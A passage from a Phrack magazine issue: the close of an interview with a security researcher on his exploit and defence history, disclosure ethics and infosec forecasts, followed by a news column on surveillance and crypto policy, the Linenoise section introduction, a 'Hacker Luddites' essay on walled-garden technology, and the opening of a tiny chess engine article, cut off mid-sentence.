I was first to apply/extend bitslice DES to descrypt, also in JtR, in 1998,
running especially well on Alphas (the speedup from x86 to Alpha for the
bitslice DES code of the time was comparable to the speedup going from a
CPU to a GPU now).

With a team, we demonstrated that it is practical to have a
fully-functioning Unix-like system without SUID programs, and that it is
possible to do so much more (than others do) within the traditional Unix
permissions model.  Unfortunately, this is, with few exceptions (e.g.,
Vixie Cron is such a lucky exception), not being embraced by others.
*BSDs stay with their SUIDs, and many Linux distros go beyond the
traditional Unix permissions prematurely.

More recently, the concepts of ROM-port-hardness (first presented in my
ZeroNights 2012 talk, with the slides online so I won't explain it here)
and multiply latency hardening for password hashing, KDFs, and
cryptocoins.  Multiply latency hardening is about tying up RAM for a
duration that cannot be made many times smaller through higher bandwidth
alone, but only through also improving integer multiplication latency,
which CPUs are optimized to be very good at.  (Some attack speed
improvement is indeed possible with ASICs anyway, but not as much
improvement as there would have been without such hardening.)  It is
also applicable to other areas, such as timed-release encryption.

The above list might look like a lot done, or like too much bragging, or
like too little done.  My own assessment is too little done per time spent.

|=---=[ Related to the previous question: Can you give us some background
        information? How and why did you come up with this? Can you give us
        an anecdote story related to it?

Regarding the ret2libc exploits, as I mentioned in the 1997 posting some
credit for this goes to Pavel Machek, a Linux kernel hacker who had
challenged me with the possibility of borrowed code attacks (without such
wording at the time, I think) on my non-executable stack mitigation.
Always thinking both defense and offense, I went ahead and implemented
those very first ret2libc exploits, and posted them.

My secondary(?) motivation was "to prove that exploiting buffer overflows
should be an art", as I wrote at the end of that e-mail.  A typical buffer
overflow exploit at the time was copy-paste from Aleph1's Phrack 49
article, even replicating the misindented __asm__("movl %esp,%eax"); line.
That was dull.  Compare this to today's assortment of memory corruption
exploits, which often are pieces of art.

|=---=[ Was your most notable technical achievement also the one that was
        the most fun?

While notability can be (mis)judged through the reception by others, and
this is a reason why I chose to emphasize the ret2libc exploits, I have no
such criteria for "most fun".  These exploits certainly were fun, and there
was that satisfying feeling re-reading their code, but were they absolutely
the most fun?  I'm not sure.  Many things I did were fun.

Exploration of VM-based software obfuscation possibility was fun (even if
possibly of negative ethical value as "intellectual property" protection
might be in general, although there are other potential applications of the
idea, such as for weak "whitebox crypto in the cloud" in modern speak).
Some people liked the PoC, and there were friendly copycats.  I didn't
pursue this further as I fully went into FOSS at about the same time.
A couple of years later, I was surprised to find a disassembly of my PoC in
a printed magazine, with concerns raised that the technique could be picked
up by malware.  I think this hasn't happened, but I suspect that my PoC
might have influenced the creation of VMProtect (IIRC, it also used NOR as
an emulated instruction, but added many other instructions thereby spoiling
the idea).

There were some technical feats that were not notable in terms of influence
(either because they had no such value or because they were not exposed or
were overlooked), but certainly were fun.  I mentioned some among the
"memorable experiences".  A maybe-curious one, implemented in 1995-1996 for
DOS as JMPTRACE.EXE, was guiding a program's user and making and comparing
as many as needed dumps of the program's control flow instructions' status
(not-reached, taken, not-taken, varies) to spot the instructions changing
between two sets of dumps, and automatically generate a patch to force
program behavior to one path or the other.  It was fun to see this produce
cracks in under a minute, removing the need for any manual work in simple
cases like this.  This is extending and re-applying game cheating tools'
old idea of comparing memory dumps to spot the one right variable.  Sounds
obvious, yet I'm not aware of others having done it before.

|=---=[ When you came up with the unlink metadata attack for Mozilla's
        heap, did you look for it in other linked list allocators? Did you
        realize its full potential at that time?

Actually, the attack as originally discovered and demonstrated was not on
Mozilla's allocator, but on whatever allocators of the underlying system
Mozilla used - so yes, as the advisory I published at the time said, the
technique was shown to be applicable to glibc's and Windows' allocators of
the time.  And yes, I did realize, and maybe I should have written a
separate article on just that.  I was trying to make two points at once:
that file format parsers are a major risk, and that "heap overflows" are
exploitable in this generic way.  Arguably, placing them both in one
advisory obscured the latter, but as we see from further publications by
others, including in Phrack, it was not fully missed either.

Want an anecdote on this one as well?  I first triggered the bug when
trying to optimize a JPEG for my website.  I deleted the comment in vi, but
updated the comment length incorrectly.  The browser crashed, and I didn't
let this stay non-investigated.  (These days, I grew older and oftentimes I
just ignore software crashes, letting those bugs live.  What a pity...
although I imagine the pro-bug folks would appreciate that.)

I first exploited the bug into branching to a controlled address in gdb
before having ever looked at the corresponding source code of either
Mozilla or glibc.  It's this low-level / binary approach that enabled me to
see what was possible.  If I had switched to reviewing the source code
sooner, I might not have realized the bug was exploitable.

I only looked at Mozilla's source code and at the relevant place in glibc
for figuring out what exactly was happening in higher-level terms, and for
writing it up for others.  Oh, and for producing a reliable binary patch.

|=---=[ Some of your older publications are "offensive", while in the
        recent years you seem to have focused on more "defensive" research.
        Do you agree with this statement? If yes, what were the reasons for
        this change?

I was always exploring both sides since I got into "software protection"
and (in)security.  It is possible that I alternated my focus between the
two over the years, yet I can't imagine me working on defensive research
without at the same time considering attacks on the solution or mitigation
being designed.  For example, my Phrack 53 article was both defensive and
offensive, and I dropped what later became known as hashDoS in it.

It is true that I mostly quit developing memory corruption exploits after
having published just a few (innovative) ones in late 1990s.  A reason for
this is that the desired effect was achieved, whether due to my work or/and
otherwise: people started producing advanced rather than dull exploits.

Similarly, I was one of the first (possibly the first?) to exploit a buffer
overflow on the Windows platform (in 1996, then published Windows 95 and NT
shellcodes in January 1997), but I quit almost right away as other people
also started bringing the Unix attack knowledge onto Windows.

I still co-maintain John the Ripper, which is an offensive tool.

I recently participated in a project to implement energy-efficient bcrypt
cracking on Epiphany and FPGAs, which is also offensive.

I designed yescrypt, which is defensive, but in the process I went through
lots of attacks on it.

Yes, our Openwall GNU/*/Linux project is defensive.

|=---=[ Related to the previous question: Which of the two do you think
        bears more fruit for a researcher; offensive or defensive research?
        Which of the two increased your learning and understanding more?

I'd say offensive as you need to consider attacks when working on defensive
research.  What may happen in practice is that when you naively go
defensive-only, others break your defenses (e.g., my early and naive
software protection schemes) and make you learn in that way.  If you're
lucky, or if you deliberately provide the incentive (bug bounty?), this
happens early on, before there's too much at stake (and then you start
thinking like an attacker as well... or you fail as a defender).

|=---=[ What's your take on the IT security industry vs. "the underground"?

A large part of today's IT security industry that I'm in contact with grew
from 1990s maybe-underground, so it's people we have a common understanding
with.  It's good.

As to the industry vs. today's underground, I don't know.  I guess there's
some overlap.

There's also some overlap of the civilian IT security industry (and
presumably the underground) with the military, intelligence, and law
enforcement.  Some are contributing to ethically questionable efforts.
(I am not implying that any work for governments is ethically questionable.
A lot of it isn't.  That's where the Internet came from.)

There's also the military rhetoric (such as "cyberwar"), which gets picked
up by non-tech yet powerful people.  This is a theme of my ZeroNights 2014
keynote game: "Yesterday infosec was such an easy game to play.  Now we
need a place to hide away?"  Was it really a game back then?  And is it
still a game now, or is it time to hide away (move on to the many
non-security areas where we can constructively hack useful things without
ethical uncertainty)?  I have no "authoritative answers" to these; I just
like to remind us to ponder on this in our decision-making on what to work
on next.

Finally, there are marketing-mostly companies and activities, which are
leeching funds without doing much else.  These happen to provide a false
sense of security, and vulnerabilities in the security software itself.

Overall, I think most IT security expenditures are not cost-effective, but
it's similar for other large industries.  Wasted money isn't necessarily
bad per se.  Money has no inherent value, it's just an instrument in the
economy and it's voting power.  What matters is whether the expenditures
result in people wasting their and others' lives on unhappily doing useless
work or not.  Unfortunately, they do, but not to as bad an extent as it
might seem at first.  (And yes, this also affects distribution of wealth.)

Besides the IT security industry, there's also much increased attention
(compared to 20 years ago) to security elsewhere in IT, as well as much
improved knowledge of how to tackle safer design of IT systems.  This is a
lot more cost-effective than spending on security on its own or as an
afterthought.  It provides not only security, but robustness, and in ways
that impose fewer restrictions on the users.  Speaking of restrictive
security, this reminds me of anti-security and its less reasonable aspects:

Did you possibly mean your question in context of the (arguably eroded)
anti-security movement of 2002-2009 (arguably different from its earlier
form of 2001)?  I think that's a false dichotomy built upon several likely
flawed assumptions.  As I understand, one assumption was that the security
industry's growth was contributing to decline of the underground.  I think
it actually was change and not decline.  Yes, some people were growing up
and moving on and into the industry (no, this didn't make them "enemies"),
but also a new generation was joining the underground.  Phrack largely lost
its anarchy aspect, even prompting "fake Phrack" during that period, but
whatever happened to Phrack, etc. didn't necessarily speak of the entire
underground.  In fact, that very movement exemplified the diversity that
continued to exist and flourish (even if with some aspects I personally
wouldn't condone, since those infringed upon freedom of choice by others).
Another assumption was that the security industry still depended, and in a
"bad way", on sustained scaremongering and on real security threats found
in full disclosure publications.  I think that even if (hypothetically)
those ceased, the industry would grow at roughly the same pace, and it
wouldn't be any more focused on real threats.  On the contrary, I think it
would be spending a larger fraction of resources on people unhappily doing
useless work, with no reduction in total resources spent.

This is my prophile, and thus my opinion; I do not claim it is the ultimate
truth.  I hope I haven't built a strawman, but in case I have please take
the above paragraph on its own merits (not necessarily referring to the
specific movement).  I was mostly not around during those years, so I could
well have missed crucial detail, and I understand that anti-security wasn't
only about those things (and I think initially not about them at all).

|=---=[ What is your stance on full-disclosure vs non-disclosure? Are there
        situations where both are needed, or is it one or the other?

I generally favor full disclosure, but I don't oppose occasional use of
coordinated disclosure prior to the full disclosure.  I do oppose excessive
use of coordinated disclosure, as well as excessive embargo periods.
I also buy into Ted Unangst's suggestion to call this "selective
disclosure", with the negative connotation.  This is why I agreed for
Openwall to host not only the oss-security list (where full disclosure is
practiced), but also the (linux-)distros lists (for advance notification
to distro vendors, PGP re-encrypted).  As someone hosting them, I get to
dictate policy, not letting issues stay in the limbo for too long (and
forcing them to be brought to oss-security).  Obviously, what's
"excessive" and "too long" is subjective (there is a published policy on
that for our lists, but how we came up with this specific policy is
subjective).  And yes, it's necessarily "selective".

I am generally against non-disclosure, but there may be exceptions.  As I
understand, it exists out of intent to use or/and profit off of one's
finding, concerns of others taking advantage (unfair or any at all) of
one's finding defensively (you doing free bug hunting for the vendor),
offensively (use of your recent disclosure for attacks on not-yet-patched
systems), or/and commercially (scaremongering, marketing, actual security
products), concerns of getting oneself in trouble (e.g., the vendor going
after you), not wanting to lock other hackers out, increased appreciation
of the bugs (letting them live just for the sake of it), not wanting to
affect game dynamics, lack of motive (perceived need) to disclose, or/and
just laziness.  This list is probably non-exhaustive.

I think there's rarely an ethical way to profit off of a bug without its
planned public disclosure (remember, this might not be a game anymore) and
there are plenty of other ways to make decent money, including in IT
security, without such ethical compromises.  I can sympathize with many
possible reasons for one's choice not to disclose a bug, especially in
context of jailbreaks or DRM (thus, retaining the essential freedom to
fully utilize one's own devices or content).  However, it should always be
considered that information may leak or be rediscovered by others.

|=---=[ Some claim that the hacking scene is growing old and that there are
        not enough talented young people interested in hacking to replace
        it. What are your thoughts on this?

There are plenty of talented young people interested in hacking.  What may
be changing (or maybe not) is scene spirit.

|=---=[ What is your advice to the new hackers reading this?

I tried to share some maybe-wisdom throughout the pseudo-memoirs and
answers above.

FX's advice of "Try Harder 2 Be Yourself" makes sense to me -
individuality, curiosity, creativity.  Being a hacker is about all of
those things and, whatever the darker undef color folks say, it isn't
necessarily about ever hacking into systems, which might or might not even
be relevant (depending on creativity involved or lack thereof).  Last but
not least, try to be a good person, while at the same time staying
yourself.  (Few people are genuinely bad.)  This means integrity, too.

A hacker shouldn't need guidance.  If you feel like asking an old-timer for
guidance, you're probably on the wrong path.  Rather, it should be about
your own creativity, and you'd find you have more curiosity and more
things to explore than you have time for.

However, it is in fact helpful to be introduced to things you might not yet
have found on your own.  Also, it is OK to bring up specific questions -
not of the sort "what's next", thus not step-by-step guidance, but asking
in appropriate communities for advice on very specific technical issues you
already ran into.

The landscape has changed.  On one hand, the previously low-hanging fruit
has been explored, so the barrier to entry may be higher now.  On the
other, a lot of information and tools are now easily available, and there
are friendly communities that are even easier to reach than before, and
without the elitism too, so the barrier to entry may have lowered.
Overall, it's just different.  There's new low-hanging fruit too - e.g.,
for the coming "Internet of things" you'll end up building upon and
porting over the previously explored attack techniques to this new area,
and hopefully finding something creative about it as well.

It's probably riskier (and less of a game) to explore systems online now,
but on the other hand you can have plenty of rare systems in emulators/
VMs, and you can "hack" in CTFs, which really are just games (good!)  Bug
bounty programs provide you a previously unheard-of opportunity to not
only explore some systems online in some limited ways, but also get paid
for it - and it's a game (also good!)  You don't have to worry about how
you'd get online to connect to a CTF server tomorrow.  There are no such
survival challenges in today's CTFs.  You wouldn't even voluntarily go for
the headache of the network lag and frequent disconnects, even though
technically those could be simulated.  The spirit is probably very
different now.  Times change.  (But maybe not yet by this much in some
developing countries?  Just like USSR/Russia was lagging behind back then.
As a cat, I see a lot of naive mouse activity from Indonesia, so maybe it's
still like that in there, perhaps with wireless in place of dialup?)

Firmware hacking has probably stayed the same, including the spirit, and in
fact the range of opportunities has expanded.  Lots of ethically sound
opportunities there, too.

There are many ways to be a hacker without ever getting into (in)security -
e.g. hacking on non-security aspects of a free operating system - or even
without focusing on computing, although there's a hot and highly relevant
area which does involve computing: bioinformatics.

|=---=[ What is the future of hacking? The future of "the underground"?

Hacking will go on, in all meanings of the word.

The underground, the kind of it that I consider positive, might be getting
blended with other communities, although I hear there are forums that have
sort of replaced private BBSes of before.

There will also remain for-profit groups (and their forums, communities,
etc.) that technically are underground, but that's different - not the
kind of underground I possibly associated with.

Very different kinds of hacktivism will also continue, and I think these
are for human rights, transparency, protests, and attempts to influence the
game (many or most of them misguided).  Also a lot of malicious and just
for fun trolling and stalking, but masquerading as hacktivism - that's not
even hacking, but it can involve e.g. (D)DoS attacks and thus be lumped in
with hacking/hacktivism.  Also manipulation of public opinion via technical
means (automated sockpuppets, etc.), including attributed to state actors.

|=---=[ What do you think the biggest infosec challenges for the next 5
        years are/will be? And what should be done about them?

5 years is not that much, so the challenges will stay mostly the same as
today's.  Attention will be shifted to some specific areas all of a sudden,
like we've seen it happen for SSL/TLS starting with Heartbleed, but this
does not mean those areas actually suddenly started to need more attention
(maybe they needed it before as well, and/or maybe they don't deserve as
much now).

Below are some that will be changing from today's.  This does not mean
they're the absolute biggest challenges - I think the biggest are the same
as today's - but they might be among the biggest that change from today's:

Use of virtualization will increase even further, on all kinds of devices,
including with nested and mixed technologies, which will bring new code and
new bugs with it (such as in front-end software and middleware used to
manage those VMs/containers), and inconsistent/violated security
models/assumptions.  Ideally, there should be demand for under-the-hood
simplicity of such solutions, but unfortunately this demand is lacking, and
so will the supply, likely resulting in some ridiculously complex and
inconsistent systems.

Use of "microservices" will continue to increase, and so will server-side
request forgery attacks - and defenses against those.  With separation of
backend services improving, there will be an unfortunately to-be-missed
opportunity to make it privilege separation rather than merely operational
separation.

For crypto, some of those backend servers could act as HSM-alikes, but this
opportunity will also be missed due to HSM-alikes requiring HSM-like rather
than server-like sysadmin practices.

Use of centralized management will increase - config file management across
all of organization's virtual and physical servers, etc.  This means a
single point of failure, and of security compromises too.  We could have
gained intranet security boundaries through greater separation of backend
services, but instead we'll lose them through greater centralized
management.  This applies to (security) event monitoring, too.

With more levels of abstraction, (live) migration, hosting infrastructure
outsourcing, and increased use of solid-state non-volatile memories
(ranging from "disks" to "RAM"), it will be even harder (and arguably
counter-productive) to keep track of actual devices underlying the logical
assets and, even once located, to securely wipe those devices when they're
to be retired (hard to do for flash memory with over-provisioning and wear
leveling) - but people typically neglect to do this now anyway.

IPv6 deployment will increase more rapidly than it did in prior 5 years.
We'll see more talks about the inadvertent security exposures this brings.

Use of encrypted communications will continue to increase, with technical
pressure put on those who are lagging behind in protocols support (upgrade
or fall off the net).  As a side-effect, this will prevent some legacy
systems from being accessed or from talking to many newer systems.  In
some cases, we'll see fallbacks to unencrypted communications where
previously legacy encryption was being used.  In some other cases, we'll
see software updates stop being installed, thereby leaving systems exposed
to more vulnerabilities for longer.  I'd like to see a saner, case-by-case
approach here - e.g., with opportunistic encryption, there's little point
in insisting on the latest protocols (refusing legacy ones), and a
WordPress updates server isn't really helping security by denying
connections from older systems.  Unfortunately, I don't expect an
improvement in the approach taken (in part because case-by-case is
necessarily more complex than one-size-fits-all guidance), and so there
will be more collateral damage.

With luck, we'll see another spike (after 2013's) in demand and hopefully
supply for line-rate encryption in high-speed network devices, due to a
combination of genuine security-consciousness and hype and marketing
opportunities.  Assuring security of encryption provided by those typically
proprietary devices will be tough (e.g., does this one device actually
provide perfect forward secrecy?)  Ideally, there should also be demand for
at least some openness of such devices for security review.

SCADA will move even more into the spotlight, and will remain with lots of
low-hanging fruit for years.  Cars and IoT will continue to join SCADA
under the spotlight.

Control over end-user devices will continue to be taken away by the
vendors, and jailbreaks will continue too.  Arguably well-intentioned
hardware backdoors (remote management, anti-theft, etc.) will continue to
be introduced, and will remain a concern.  Open hardware projects will
advance, and more of them will be started, including in response and
trying to address these concerns.  Backdooring potential of taped out
designs at chip foundries will become more relevant and thus a topic of
more discussions.

As open CPU designs (such as RISC-V and J Core aka free SuperH) succeed,
there's also good potential for an open FPGA with a FOSS toolchain (perhaps
building upon existing FOSS projects such as Torc and Yosys).  This could
be crowd- or/and VC-funded, and having it would address some concerns.

|=---=[ Open question. Anything more you would like to say to Phrack
        readers?

I can neither confirm nor deny anything stated in this prophile.

I wrote a lot (sorry for your time!) and I included some possibly strong
opinions, but I do not mean to speak with authority.  My involvement in the
underground, if any, has been rather limited and brief, nor am I a true
old-timer (1990s wasn't that long ago).  I also would like to apologize to
past/other(?) Phrack editors as I had refused to be prophiled before on
two(?) occasions.  It felt like too much of a drag and events were too
recent.  Time had to pass so that I could provide perspective, as I tried
now.  Nothing to do with Phrack's editor teams changing, just the timing.


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x03 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack World News ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ by the Phrack staff ]=-----------------------=|
|=-------------------------=[ staff@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

Wow, 4 years have passed! One of the possible positive outcomes of slow-
paced releases of Phrack is that Phrack World News gives us the opportunity
to look back on a few years' worth of happenings and ponder about the bigger
picture for a moment. First of all: Snowden. It feels like ages ago now,
but, for anyone living under a rock, in 2013 Edward Snowden [1] leveraged 
his position working at the United States National Security Agency to copy 
and later leak [2] classified documents on NSA's global surveillance 
operations. If the very previous issue of PWN [3] prophetically warned 
about the massification of surveillance as a threat to our civil 
liberties, the Snowden leaks only proved what hackers and conspiracy 
theorists had believed and proclaimed for a long time: the US government 
unlawfully spies on its own citizens as well as everyone else's.

While it is probably futile to believe that the social and political
reactions to the Snowden leaks have had any meaningful impact on the NSA's
operations, the disclosed information is an invaluable resource to validate
that governments will go a long way to collect intelligence as broadly and
deeply as they can. The leaks have shown that the tactics employed by NSA
ranged from the widespread tapping of phone (e.g. voice, SMS) and network
traffic to more punctilious methods such as the intercept and tampering of
export computer and network equipment to insert spying implants. This does
not mean, of course, that we have global surveillance "figured out". In
fact, quite to the contrary, it should be expected that many of these
techniques have been revamped by now, and that many more are to follow, as
a natural step in the continuous endeavor for stealthiness. As such, any
effort, technical or otherwise, to safeguard your privacy is more valid
than ever.

But indeed, it seems that some of the efforts on designing and implementing
better crypto systems paid off and governments are starting to have their
monitoring and investigative capabilities limited by evolving security. One
indication of that is the growing insistence of various nations on the
mind-boggling hopelessly insane push for crypto backdoors [4]. The sad and
unfortunate wave of terrorism the world has been dealing with is repeatedly
and shamelessly used to support the lobbying for less information security.
Another (at the moment) ongoing instance of this is the significant dispute
between the FBI and Apple [5], which refuses to provide the FBI with a way
to bypass the lock screen of a terrorist's (and everyone else's) iPhone.

And sure enough the controversies involving governments and information
security do not stop there. In the past few years we have seen some nations
being more frank about their offensive capabilities [6] or sometimes
industry-sourced intelligence [7] combined with publicity on more impactful
attacks [8] helped demonstrate that hacking is increasingly a bigger deal
for nation-states. All of this action is (or has been posed as) a driving
force behind moves such as adding "cyber weapons" to the terms of the
Wassenaar agreement [9], an initiative that, if not carefully formulated,
will turn out to be not only utterly ineffective but also extremely harmful
for the practice of security research and, in consequence, to the
progressive development of information security in general. Plus, other
recent breaches, such as Gamma [10] and Hacking Team [11], tell us that
even government-affiliated organizations are freely operating without
respecting UN embargoes and international regulations anyway - ironically,
it was hackers and the security community that exposed them, and not law
enforcement. So, who is the law working for?

Lastly, and with a heart heavier than any of the topics above could ever
cause us, Phrack would like to say goodbye to a few illustrious members of
our community that have sadly passed away. Since it's been 4 years we
are not going to attempt to list out every instance, however we can
easily say that as a community we have lost some incredibly talented,
charismatic and fantastic people, and we feel the loss greatly.


Live free,

- The Phrack Staff


[1]  - https://en.wikipedia.org/wiki/Edward_Snowden
[2]  - http://www.businessinsider.com/snowden-leaks-timeline-2014-6
[3]  - http://phrack.org/issues/68/3.html
[4]  - http://www.theguardian.com/technology/2015/nov/18/
       us-europe-reignite-debate-back-door-encryption-paris-attacks
[5]  - http://www.wired.com/2016/02/apple-brief-fbi-response-iphone/
[6]  - http://www.wired.com/2016/01/
       nsa-hacker-chief-explains-how-to-keep-him-out-of-your-system/
[7]  - http://www.wired.com/2013/02/chinese-army-linked-to-hacks/
[8]  - http://arstechnica.com/security/2015/06/
       why-the-biggest-government-hack-ever-got-past-opm-dhs-and-nsa/
[9]  - http://blog.erratasec.com/2015/05/some-notes-about-wassenaar.html
[10] - http://www.zdnet.com/article/
       top-govt-spyware-company-hacked-gammas-finfisher-leaked/
[11] - http://www.wired.com/2015/07/
       hacking-team-breach-shows-global-spying-firm-run-amok/

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x04 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[     various     ]=-------------------------=|
|=-----------------------------------------------------------------------=|


An old Phrack Staff member and friend used to say that "a strong Linenoise
makes a good release". 

We begin our journey with an interesting philosophical article, "Hacker
Luddites" by an anonymous author. TL;DR, ever had an iPhone? Have you
realized you don't actually own something you paid several hundreds of
bucks to acquire? The "cloud era" trend, which has convinced many people,
as well as businesses, to literally grant owning rights for their data to
large corporations, is now everywhere. How is it affecting our state of
mind and where is this going?

Our technical part is very strong. Baudsurfer developed an interesting ASM
chess game in just 256 bytes; read the heavily-commented code and feel the
nostalgia in your bones. More old-school goodness in a lovely article
dealing with secure shells and how one can exploit common misconfigurations
to bypass various limitations and break out of restricted environments.
Articles like this have a lot to offer to the hacking community. We urge
our dear readers to follow DangerMouse's example and submit more articles
like his!

The next article has a strange back story. We received this submission
long ago and we decided to publish it. Admittedly, a lot of time has passed
since then. The author has stopped replying to mails, but he was originally
positive about publishing his work. Read it and see how you can cause
short ID key collisions in GPG. As our everyday computing machines become
increasingly powerful, such attacks become more and more realistic.

Following that are two excellent short articles exploring subjects every
exploit developer is doomed to deal with, namely boundary conditions and
shellcoding. Our rotten haxor chown has written a nice guide on how to use
Microsoft's Z3 solver to facilitate the process of exploit development.
Recently (well, maybe not so recently, lulz), there has been a shift
towards more formal methods even by old-school haxors who have always
preferred and obeyed the KISS (Keep It Simple, Stupid!) primitive. Hackers
have understood that the process of vulnerability discovery as well as
exploit development can be augmented by modern mathematics and maybe become
even more interesting! One cannot easily forget p64_0x08.txt, right? In the
next article, fishstiqz shows us how you can simply use your compiler to
easily build shellcodes for Windows. If you ever thought shellcode
development on Microsoft's operating system is a pain in the ass, then
this article is definitely for you.

Last but not least we have an opinion piece on the vulnerability
disclosure circus, the incentives and the related moral questions (lulz)
by two anonymous contributors. It is balanced and dispassionate and we
urge you to read it in the same manner.

That's it you greedy mofos, another strong Linenoise! Enjoy!


--[ Contents

    1 - Hacker Luddites ................................... anonymous

    2 - Chesslin .......................................... Baudsurfer

    3 - He Compels Secure Shells .......................... DangerMouse

    4 - Personalized PGP Key IDs .......................... f1los0tt1l3

    5 - How to cheat at maths ............................. chown 

    6 - Shellcode the better way, or how to just
        use your compiler ................................. fishstiqz

    7 - Resisting the Hy(p|v)e ............................ anon & anon


|=[ 0x01 ]=---=[ Hacker Luddites - anonymous ]=--------------------------=|


In the west, far gone are the days of slavery. Men live freely with their 
minds and bodies. So the idea of technology potentially limiting these 
things is absurd.

Computer technology today might not always encourage these principles of 
free mind and body though. Hardware and software is increasingly built in 
the same manner as stone walled gardens, restricting those outside the 
inner circles of technocrats. The designers decide to clutch tightly to 
their systems, defining the full set of actions allowable and therefore 
thinkable on their systems. They are limiting the potential for 
creativity, discovery, and reason in order to further profit. This profit 
is furthered by control because certain control limits piracy, stops 
malicious software from propagating, simplifies the user experience for 
the majority of consumers, and creates revenue through software-regulated 
micro decisions that constrain the full capacity of the hardware and 
software systems being sold.

Only the masters of the garden, the designers, are allowed inside the 
stone walls, where they are free to create and are conscious of the inner 
workings and plans. Those outside are not allowed inside the garden. Those 
who are not inside the circle of the original creators do not get to 
create without delegated permission. And consumers and third-party 
developers are too far down the caste system to be allowed arbitrary 
control of their own possessions.

This leaves the creators on the outside of the stone walls dependent on
brilliant and dedicated minds to bypass the wishes of the designers. These 
brilliant minds attain a level of consciousness about the constraints of 
the system that the designers themselves did not understand, and pass this 
on to the masses. Along the way come miscreants, thieves, and pirates.

In a free market system, if more arbitrary creation is vital in the long 
term, then more creative systems will arise to fill the need. In the short 
term, allowing feedback from the outer castes and integrating their ideas 
has been shown to be more than sufficient for sustained exponential growth 
on the rise to market domination.


Hacker Luddite: (Oxymoron) A person opposed to technology that greatly 
limits, through artificial means, human potential for consciousness, 
reason, or creativity with that same technology.

Hacker Luddites hate stone wall garden technologies. Why shouldn't a 
person be allowed to hold a piece of technology and attempt to modify or 
adapt that technology to suit their will at any given moment? The only 
limitation should be the consciousness required to make changes. And 
certainly not artificially restricted by the designers of the technology. 
In the same way that Kant based the premises of the categorical imperative 
on the ability for humans to reason, Hacker Luddites view this capacity 
for reason as a fundamentally important human ability. When computer 
technology, purchased and entirely in the physical possession of the 
owner, denies arbitrary modification and creation, it greatly reduces the 
ability to reason about the universe with that technology. That technology 
does not allow people to transcend the designers' ideas and fully embrace
some of their most important human traits. Instead it delegates the 
consumers to subordinates with restricted consciousness, and restricted 
capacity for reason, and restricted creativity.


Next up, computer technology applied excessively for the conversion of 
human attention into personal profit.

To the hacker luddites, another nefarious category is the computer systems 
of the world which have been built to turn human attention into profit. 
Rather than proceeds coming from the advancement of humanity, the proceeds 
come primarily from the ability to guide human attention into that 
technological system. The system might be making the profit through ads, 
or it could be a game consumers pay for.

It is understood that resources are required to run technologies and that 
some exchange of information and resources is expected between consumers 
and creators of that technology. Ads can be helpful to a consumer by 
showing them products which they actually want, and games or sites for 
information exchange are highly enjoyable to many people and therefore 
provide benefit. It is when the methods and means become excessive that 
hacker luddites take an issue.

When technologies, whether delivering advertisements or games, exploit 
human psychology and physiology to turn a profit from their consumers, 
they may often be directly limiting, and in a significant way, the 
consciousness, reason, or creativity of that consumer.

The other problem is when instead of advertisements showing people what 
they want, advertisements subconsciously manipulate people's desires (such
as sex, popularity, and power) to override their consciousness and
reasoning abilities to get them to want and purchase products regardless
of the products' abilities to help the consumer attain those desires.

And what if technologies instead of providing an opportunity for 
relaxation or fun or profound information sharing or whatever also create 
systems of psychological control where neurophysics brings users' attention
back to technology to get addictive releases of dopamine or serotonin or 
who knows what, using the darker arts of gamification. Or perhaps innate 
human survival mechanisms related to group dynamics are being exploited by 
the technology, such as showing automatically generated advertisements, 
messages, and symbols as endorsed by members of a group, or creating 
virtual resource systems where drives for competition or collaboration 
drive behavior. 

It may be that these technologies which capture human attention are simply 
what most consumers want from their technology, after all 30% of internet 
traffic generated by humans is for porn [1]. If distraction and the 
subordination of reason, creativity, or consciousness is the will of the 
majority, Hacker Luddites seriously disagree with the majority and most 
definitely oppose the designers that subordinate them.

What defenses does the modern person have to protect against the likes and 
tweets and clicks and slide to unlocks and checkmarks and tabs and porn 
and endless dopamine and serotonin harvesting mechanisms? These systems 
were sometimes built to reap monetary gain, sometimes built for 
communication control, and sometimes for nothing of any value... in 
exchange for a portion of the time, attention, and thoughts of the user as 
well as their information...


Don't buy and don't use them. 

If you do use them, use them only in great moderation and only at
consciously specified times. 

Inform others and expose existing and emerging technologies which may be 
limiting human potential.

Augment the technology in your possession to block advertisements. 

Degrade the quality or value of your attention to the attention-to-profit 
technologies by: 

- Sharing and proxying accounts with multiple users.
- Writing user interfaces to the user interfaces.
- Poisoning user activity with subtle fuzzers alongside your normal 
activity where it makes sense.

Similarly, make your information more useless by lying.

- Don't bother with real names where they don't matter.
- Fill out forms like madlibs.

[1] http://www.extremetech.com/computing/123929-just-how-big-are-porn-sites
-- 30% of the internet traffic out there is porn


|=[ 0x02 ]=---=[ Chesslin - Baudsurfer/Red Sector Inc. ]=----------------=|


                               [ CHESSLIN ]
                     [ by Baudsurfer/Red Sector Inc. ]


|=--[ Introduction

This is a sizecoding exercise to code a playable chess engine in 256 bytes.
This POC is very experimental and bears several shortcomings when comparing
with any other real FIDE existing chess game engine : you have been warned.
It plays like a fish as AI is reduced to a half-ply max solely, it also has
no end-game detection, pawns move only a single square, it cannot castle or
do promotions - let alone en-passant - and takes about a hundred seconds to
play. It also only works on Microsoft Windows XP SP3. Like minimalist Edlin
line editor, Chesslin focuses on a single console line. Whites start at the
bottom of the virtual chess board but SAN notation order is inverse ranks :

   A B C D E F G H
1  r n b q k b n r
2  p p p p p p p p
3
4
5
6
7  P P P P P P P P
8  R N B Q K B N R

So in order to test Chesslin one can uudecode below binaries to input first
algebraic notation "h7h6" characters starting game by moving the White pawn
on H file from seventh rank to sixth rank. A longer example string sequence
of gameplay is "h7h6h2h3g8f6h3h4f6g4h4h5g4h2g1h3h2f1h3g5". Remember if your
keyboard input is not legal chess then Chesslin will silently expect you to
enter again a conforming four ascii character string just to proceed. Thus,
if only a single faulty character was entered you will need to fill-in with
three more "dummy" characters before re-typing a desired algebraic notation
for validation only occurs every four-chars exactly. All bugs are ofc mine.
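
The board orientation and four-character input framing described above,
together with the back-rank constant from the source listing, modelled in
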